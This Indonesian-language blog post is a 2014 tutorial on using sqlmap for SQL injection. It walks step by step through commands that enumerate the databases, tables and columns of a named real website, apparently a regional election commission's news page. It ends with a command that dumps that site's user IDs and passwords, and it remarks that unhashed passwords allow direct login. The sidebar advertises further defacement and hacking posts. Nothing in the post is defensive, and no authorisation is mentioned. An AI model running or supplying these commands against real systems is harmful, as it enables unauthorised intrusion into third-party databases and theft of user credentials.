• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

SQL Injection dengan bantuan SQLMAP

May 22, 2014 by Jack Wilder 2 Comments

Oke kali ini saya mau share tutorial SQL Injection dengan bantuan sqlmap. Tutor lama sih sebenarnya. Share aja barangkali ada yang kurang paham dengan tutor yang pernah dibaca maka ane mau share lagi dengan sejelas jelas nya.
Sebelum membaca tutor lebih lanjut , pastikan kalian yang pengguna windows sudah menginstall python.

  • Download python
  • Download Sqlmap

Setelah Python diinstall, unzip sqlmap nya . Ane sendiri meletakan nya di C:/tools/sqlmap . Silahkan sesuaikan sendiri.

Mulai mencari target yang vuln sqli. Pasti tau kan ? yang ketika diberi string tanda petik satu (‘) akan muncul error.

Saatnya eksekusi :v
Buka sqlmap nya.
run cmd , lalu ketik cd/tools/sqlmap <– sesuaikan sendiri dimana kalian tadi meletakkan folder sqlmap nya.

setelah itu masukkan command sqlmap.py -u url_vuln –dbs

contoh

sqlmap.py -u http://kpubanjarmasin.com/berita.php?id=253 –dbs

nah, ketemu tuh nama database nya.
Lanjut ke command berikut nya
sqlmap.py -u url_vuln -D nama_database –tables

contoh

sqlmap.py -u http://kpubanjarmasin.com/berita.php?id=253 -D ymsfrtlp_data –tables

Nah muncul tuh table dalam database nya.
Lanjut ke command berikut nya :
sqlmap.py -u nama_site -D nama_database -T nama_table –columns
contoh

sqlmap.py -u http://kpubanjarmasin.com/berita.php?id=253 -D ymsfrtlp_data -T tabeluser –columns

Yosshhh.. muncul daftar column nya. Searang saat nya melihat isi dari user dan password.
sqlmap.py -u nama_site -Dnama_db -T nama_table -C nama_kolom –dump <– jika kolom lebih darisatu pisahkan dengan tanda koma.
contoh

sqlmap.py -u http://kpubanjarmasin.com/berita.php?id=253 -D ymsfrtlp_data -T tabeluser -C userid,password –dump

Nah, udah keliatan kan user sama pass nya. Kadang ada yang di hash tapi kalo beruntung ya tinggal login . Pass nya gak di hash.

Dorr !

Sekian tutorial kali ini . Semoga bermanfaat 🙂

Filed Under: SQL Injection Tagged With: Hacking, Python

Reader Interactions

Comments

  1. cak oni says

    May 23, 2014 at 12:41 am

    lama gak blogwalking gan

    Reply
  2. lowongan kerja says

    May 27, 2014 at 4:11 pm

    klik http://www.lowongankerja24.com

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Tumblr Custom Domain or Subdomain Takeover

WordPress Army Knife CSRF File Upload Vulnerability

Shopify Custom Domain or Subdomain Takeover

FastMail Custom Domain or Subdomain Takeover

Open Redirect Bypass Cheat Sheet

WordPress Fraction Theme Version 1.1.1 Privilege Escalation

Deface WordPress dengan Exploit WordPress TheLoft Theme Arbitrary File Download Vulnerability

Reverse Shell From Local File Inclusion Exploit

Arti dari Kata Deface yang Sering Dibahas oleh para Hacker

Cara Mudah Hack cPanel dengan Fitur Reset Password

LinuxSec / 16 queries in 0.12 seconds